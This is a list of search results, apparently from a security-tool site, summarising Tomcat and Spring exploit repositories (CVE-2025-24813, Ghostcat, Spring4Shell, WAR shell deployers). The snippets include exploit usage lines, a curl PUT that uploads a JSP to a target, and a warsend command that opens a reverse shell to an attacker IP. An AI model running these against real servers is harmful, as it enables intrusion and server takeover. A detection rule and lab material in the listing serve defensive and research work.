13719 matches found
CVE-2025-24813
CVE-2025-24813 - Apache Tomcat 路径等价漏洞 Apache Tomcat 由于对路径中的 ../ 序列处理不当,存在路径等价 / 路径遍历 问题。 CVE ID: CVE-2025-24813 严重性: 严重 参考链接: https://github.com/advisories/GHSA-83qj-6fr2-vhqg PoC 步骤: 1. 使用 PUT 方法发送curl 请求: root@kitploit: curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \ -H...
CVE-2020-1938-Tomact-file_include-file_read
CVE-2020-1938Tomcat-fileinclude and filered Tomcat的文件包含及文件读取漏洞利用POC 文件读取 Usage :python2 "Tomcat-ROOT路径下文件读取CVE-2020-1938.py" -p 8009 -f /test.txt 127.0.0.1 文件包含 Usage :python2 "Tomcat-ROOT路径下文件包含CVE-2020-1938.py" -p 8009 -f /test.txt 127.0.0.1 复现详情:http://www.svenbeast.com/post/fqSI9laE8/ img:...
AttackTomcat
AttackTomcat 检测漏洞清单 CVE-2017-12615 PUT文件上传漏洞 tomcat-pass-getshell 弱认证部署war包 弱口令爆破 CVE-2020-1938 Tomcat 文件读取/包含 使用方式 初次使用前请先在设置中重新设置配置文件,其他问题请仔细阅读!!!,java -jar .jar 启动可查看运行日志信息!! 下载源码maven编译,或者直接下载Releases。 双击jar包即可运行或执行java -jar AttackTomcat 代理 使用http和socket代理。 配置 启动jar包,生成配置文件config。 ...
CVE-2025-55668
CVE-2025-55668 Apache Tomcat - 通过重写阀的会话固定...
CVE-2025-24813
CVE-2025-24813 漏洞利用工具包 这是一个针对 CVE-2025-24813 的先进自动化利用工具,旨在攻击存在不安全会话反序列化漏洞的 Apache Tomcat 服务器。 🔍 功能特性 从文件或单个 URL 进行多目标扫描(--targets / --url) 自动执行 gadget 链测试(CommonsCollections1-7、BeanShell、Spring 等) 操作系统检测与后渗透利用载荷(Linux/Windows) 从常见端点发现会话 ID 详细日志同时输出到控制台和文件 支持 TLS(HTTPS),并可选择禁用 SSL 验证 ⚙️ 使用方法...
TomcatKiller-CVE-2025-31650
TomcatKiller-CVE-2025-31650 Una herramienta diseñada para detectar la vulnerabilidad CVE-2025-31650 en Apache Tomcat versiones 10.1.10 a 10.1.39 Esta vulnerabilidad permite a un atacante provocar una fuga de memoria enviando solicitudes HTTP/2 especialmente manipuladas con encabezados de priorida...
Silent-Call
Silent;Call Cisco Unified Communications Manager 15.x 上的预认证远程 root 漏洞 三个 HTTP 请求。零凭据。root 权限。每一通电话现在都归你所有。 攻击链 步骤| 组件| 描述 ---|---|--- 1| Spoofhack| X-Forwarded-For 请求头欺骗绕过 Tomcat Manager 上的 localhost 限制 2| Keyhack| 硬编码凭据(在所有 CUCM 安装上均相同)允许进行 WAR 部署 3| Roothack| 对 gdb 的无密码 sudo 加上攻击者控制的命令文件 → root...
tomcatWarDeployer
tomcatWarDeployer Apache Tomcat auto WAR deployment & pwning penetration testing tool. What is it? This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell...
CVE-2025-48799-
CVE-2025-48799 – Apache Tomcat 远程代码执行(PoC) 本仓库包含针对 CVE-2025-48799 的概念验证漏洞利用代码,该漏洞是 Apache Tomcat 9.0.48 中发现的一个远程代码执行漏洞。该缺陷源于 HTTP 头解析器中的整数溢出,可通过精心构造的 X-Forwarded 头触发。 目的 本项目仅用于教育和研究目的。它展示了: 畸形 HTTP 头如何导致内存破坏 构造 shellcode 和计算缓冲区偏移量的技术 在受控环境中利用现实世界中已修复 CVE 的实践示例 工作原理 该漏洞利用程序: 1. 构造一个超大的 X-Forwarded...
CVE-2020-1938
CVE-2020-1938 このCVE-2020-1938は、https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat.git のPoCのエラーを修正し、Apache Tomcat/8.0.43バージョンでの動作を確認しました。 実習方法 1. docker-compose.yml を作成 2. docker compose up -d 3. python3 CVE-2020-1938.py -p 8009 -f WEB-INF/web.xml 最終結果...
Safer_PoC_CVE-2022-22965
SaferPoCCVE-2022-22965 一个针对 CVE-2022-22965 Spring4Shell 的更安全 PoC 功能 在 tomcat 的 'webapps/ROOT' 目录中创建一个名为 CVE2022-22965exploited.txt 的文件 可通过用户参数更改输出目录 通过请求输出的 .txt 文件来执行漏洞验证,根据你的 tomcat 配置,这可能需要人工检查。 增加了额外验证以检查返回文档的内容;某些 Web 服务器会返回 HTTP 状态为 200 的错误页面 使用方法 root@kitploit: usage:...
Spring4Shell-POC
Spring4Shell-POC CVE-2022-22965 Spring4Shell CVE-2022-22965 Proof Of Concept/Information + A vulnerable Tomcat server with a vulnerable spring4shell application. Early this morning, multiple sources has informed of a possible RCE exploit in the popular java framework spring. The naming of this fl...
spring4shell_victim
spring4shellvictim 一个有意存在漏洞的Spring应用,用于测试CVE-2022-22965 更多信息:https://www.fracturelabs.com/posts/effective-spring4shell-scanning-exploitation/ 用法 构建 以下代码将使用下列组件快速构建一个存在漏洞的Docker镜像: JDK 11.0.14 Tomcat 9.0.60 Spring 2.6.4 root@kitploit: git clone https://github.com/fracturelabs/spring4shellvictim.gi...
CVE-2020-17530
OGNL 注入漏洞利用工具 简介 一个简单的 Python 脚本,用于利用 Apache Struts2/Tomcat 中的 OGNL 注入漏洞并执行系统命令。 使用方法 root@kitploit: pip install requests colorama python3 exploit.py -u http://target/index.action -c "id"...
warsend
WARSend Apache Tomcat Manager API WAR Shell 上传 先决条件 凭据 具有 Tomcat Manager 的 Text API 访问权限 root@kitploit: $ ./warsend.sh 10.10.14.232 8090 10.10.10.184 8080 tomcat $3cureP4s5w0rd! revshell | | / / | / / / / / | | /| / / /| | / // /\ / / / / | |/ |/ / |/ , // / / / / / // / |/|// |// ||////...
CVE-2022-22965-Spring4Shell
Spring4Shell Spring4Shell(CVE-2022-22965)概念验证,包含一个存在漏洞的 Tomcat 服务器和一个存在漏洞的 spring4shell 应用程序。 有关此漏洞的详细信息 https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc https://www.springcloud.io/post/2022-03/spring-0day-vulnerability...
CVE-2020-1938
CVE-2020-1938 Suricata 检测规则 root@kitploit: CNVD-2020-10487 CVE-2020-1938 alert tcp any any - any 8009 msg:"CNVD-2020-10487 Ghostcat"; content:"javax|2e|servlet|2e|include|2e|requesturi"; content:"javax|2e|servlet|2e|include|2e|pathinfo"; content:"javax|2e|servlet|2e|include|2e|servletpath";...
tc_hack
此工具利用了 Apache Tomcat 中的一个漏洞,名为 CVE 2017 12617,通过启用 PUT 方法获取对任何服务器的远程访问。 可从此处下载(您需要从命令行运行它) 使用方法: tchack 目标 IP 目标端口...
damn-vulnerable-log4j-app
SnapAttack Log4j / CVE-2021-44228 / log4shell 资源 包含什么? 该死的易受攻击的 Log4j 应用(Damn Vulnerable Log4j App) damn-vulnerable-log4j-app 包含一个基本的易受攻击的 Java Servlet,它使用 log4j 记录 User Agent、HTTP GET 和 POST 参数。它被打包为 .war 文件,可以部署到 Tomcat 等服务器上。有关更多信息,请参阅 README。 攻击工件 attack-artifacts 包含示例 EDR、系统和应用程序日志,以及针对...
Spring4Shell-CVE-2022-22965-POC
Spring4Shell-CVE-2022-22965-POC root@kitploit: ghost㿉uchiha:$ ./exploit.py --help usage: exploit.py -h -f FILENAME -p PASSWORD -d DIRECTORY url Spring4Shell RCE Proof of Concept positional arguments: url Target URL options: -h, --help show this help message and exit -f FILENAME, --filename FILENA...